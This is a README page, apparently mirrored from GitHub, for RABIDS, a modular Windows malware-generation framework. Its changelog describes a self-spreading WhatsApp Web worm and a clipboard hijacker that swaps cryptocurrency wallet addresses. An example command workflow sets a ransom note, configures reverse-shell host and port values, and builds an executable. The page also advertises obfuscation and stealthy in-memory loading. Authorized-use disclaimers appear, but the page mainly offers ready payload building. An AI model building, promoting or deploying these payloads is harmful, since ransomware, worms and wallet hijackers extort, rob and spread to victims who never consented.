Sarwar "Bartmoss 1b4c9f849a Update the Worm
2025-07-18 02:04:11 +05:00
2025-07-18 02:04:11 +05:00
2025-07-18 02:04:11 +05:00
2025-07-06 03:59:10 +05:00
2025-07-17 02:32:57 +05:00
2025-07-17 02:32:57 +05:00
2025-07-15 16:31:55 +05:00
2025-07-18 02:04:11 +05:00
2025-07-18 02:04:11 +05:00

What's New

VERSION 0.1.4

  • New Module: bartmossbrainworm - Messaging worm
  • Features:
    • Spreads itself by automatically sending a configurable message to all chats in WhatsApp Web
    • The message can be set using the set MESSAGE "your text" command before build

VERSION 0.1.3

  • New Module: gremlin - Clipboard wallet address hijacker
  • Features:
    • Monitors clipboard for copied wallet addresses (Bitcoin, Ethereum, BEP-20, Solana)
    • Automatically replaces detected wallet addresses with user-configurable predefined addresses
    • Predefined addresses for each chain can be set using the set command before build

Overview

RABIDS Roving Autonomous Bartmoss Interface Drones is a modular Windows malware generation framework. It empowers security researchers and red teamers to rapidly build custom malware payloads by chaining together a variety of modules—such as ransomware, persistence loaders, C2 servers, and more—into a single executable. RABIDS is designed for advanced adversary simulation, malware research, and authorized red team operations.

Warning: This tool is for educational and authorized security research only. Misuse may be illegal and unethical.


Features

  • Modular Payloads: Chain multiple modules (ransomware, persistence, C2, etc.) into a single EXE.
  • Customizable Options: Configure module and build options (e.g., ransom note, C2 port, EXE name).
  • use <module> — Add a module to the build chain
  • set <OPTION> <VALUE> — Set build/module options
  • show modules — List available modules
  • show options — Show current build/module options
  • build — Build the final EXE payload
  • clear — Clear selected modules
  • delete — Remove a module from the chain
  • exit — Exit the tool

For detailed documentation on each command and advanced usage, see the RABIDS Wiki.

Example Workflow

> show modules
> use krash
> set NOTE "Your files have been encrypted! Contact evil@domain.com."
> use silverhandghost
> set LHOST 192.168.1.10
> set LPORT 4444
> build
  • The final EXE will be saved in the .LOOT directory.

Advanced Features

  • Module Chaining: Combine multiple behaviors in one payload.
  • Custom Build Options: Set EXE name, enable obfuscation, etc.
  • In-Memory Execution: Use Rust loader for stealthy delivery.

RABIDS is intended for educational purposes and authorized security testing only. You must have explicit permission to use this tool against any system or network. The authors and contributors are not responsible for misuse, damage, or legal consequences. Always follow applicable laws and ethical guidelines.


Contributing

Contributions are welcome! Please fork the repository, create a feature branch, and submit a pull request with a detailed description of your changes.


License

MIT License. See the LICENSE file for details.

Description
Mirrored from GitHub
Readme MIT 13 MiB
Languages
Python 57.4%
Nim 35.8%
JavaScript 4.8%
Assembly 2%